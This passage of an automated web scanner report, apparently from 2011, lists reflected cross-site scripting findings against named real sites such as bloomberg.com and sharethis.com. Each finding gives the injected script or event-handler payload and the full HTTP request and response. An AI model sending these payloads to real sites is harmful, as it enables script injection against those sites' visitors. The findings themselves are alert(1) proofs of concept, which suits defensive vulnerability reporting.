nm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:53 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4321036613896989359&fpid=4&nu=n&t=&sp=4f36b"><script>alert(1)</script>cf6a02d7684&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxbusiness.com
Path:   /v/feed/video/4674822.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 12a45<script>alert(1)</script>f3c8e235d87 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4674822.js?callback=videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87&template=grab&cb=20115127 HTTP/1.1
Host: video.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3952
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Thu, 12 May 2011 11:38:37 GMT
Connection: close

videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Thu, 12 May 2011 07:38:37 EDT","lastBuildDate":"Thu, 12 May 2011 07:38:37 EDT","generato
...[SNIP]...

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload ea400<script>alert(1)</script>b2c22e0c34a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 401

stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl":"http:\/\/www.mimec
...[SNIP]...

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa1d<img src=a onerror=alert(1)>865705b3363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo/bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363r%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 273

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo\/bfa1d<img src=a onerror=alert(1)>865705b3363r\/"});

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb was submitted in the url parameter. This input was echoed as 43cd7<img src=a onerror=alert(1)>8a9a606e3bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 271

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/43cd7<img src=a onerror=alert(1)>8a9a606e3bb"});

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webezines.kwithost.com
Path:   /sx25Feed.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bfa61<script>alert(1)</script>31dea62f86d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sx25Feed.php?keyword=Investment%20Firms&format=json&callback=jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d&_=1305198220619 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:45 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 2044
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d([{"content_title":"Dodd-Frank Act: Hedge Funds and <b>Investment<\/b> Advisory <b>Firms<\/b>","content_main_content":"The Dodd-Frank Act pro
...[SNIP]...

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139d0"><script>alert(1)</script>9e5f6c5a037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037');" title="Email Page">
...[SNIP]...

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848c5"><script>alert(1)</script>79cf0510bfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:57 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd');" title="Email Page">
...[SNIP]...

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4fda"><script>alert(1)</script>49e11abb79a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:56 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1');" title="Email Page">
...[SNIP]...

4.125. http://www.bloomberg.com/apps/data [sgid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /apps/data

Issue detail

The value of the sgid request parameter is copied into the HTML document as plain text between tags. The payload c716b<script>alert(1)</script>0bd294ae9c6 was submitted in the sgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/data?pid=trackstoryhits&sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6 HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; _chartbeat2=05vt53emlalrxzsu; opt=no-opt; __utmx=30057196.00013155880168891469:4:9; __utmxx=30057196.00013155880168891469:3825137:2592000; s_sess=%20s_ria%3Dflash%257CSilverlight%25204.0%3B%20s_cc%3Dtrue%3B%20ev1%3Dnews%253Asports%3B%20s_v20%3D2011-05-05%25252000%25253A00%25253A52%252520-0400%3B%20s_sq%3D%3B; DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; rsi_segs=K05539_10579|K05539_10529|K05539_10592; BT=10579&10529&10592; quint386uid=11486149183474481; oo_inv_percent=0; oo_inv_hit=1; __utma=30057196.790518761.1303930135.1303930135.1305200254.2; __utmc=30057196; __utmv=30057196.|2=201012_more_stories=9=1,3=opt=no-opt=1,; __utmb=30057196.5.7.1305200255961

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Cache-Control: max-age=900
Content-Type: text/plain
Content-Length: 71
Date: Thu, 12 May 2011 11:37:51 GMT
Connection: close


Error sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6


4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a893"style%3d"x%3aexpression(alert(1))"7e08a33da53 was submitted in the REST URL parameter 3. This input was echoed as 7a893"style="x:expression(alert(1))"7e08a33da53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe17a893"style%3d"x%3aexpression(alert(1))"7e08a33da53/$NavImagemap/0.52?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9368
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - 80868dabe98107a18525708000086fe17a893"style="x:expression(alert(1))"7e08a33da53/$NavImagemap/0.52">
...[SNIP]...

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31990"%3b533bbbd2843 was submitted in the REST URL parameter 5. This input was echoed as 31990";533bbbd2843 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990"%3b533bbbd2843?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9274
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<!--
document._domino_target = "_self";
function _doClick(v, o, t) {
var url="/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990";533bbbd2843?OpenElement&FieldElemFormat=gif&Click=" + v;
if (o.href != null)
o.href = url;
else {
if (t == null)
t = document._domino_target;
window.open(url, t);
}

}
// -->
...[SNIP]...

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf370"style%3d"x%3aexpression(alert(1))"4fa2751b636 was submitted in the REST URL parameter 3. This input was echoed as bf370"style="x:expression(alert(1))"4fa2751b636 in the application's response.

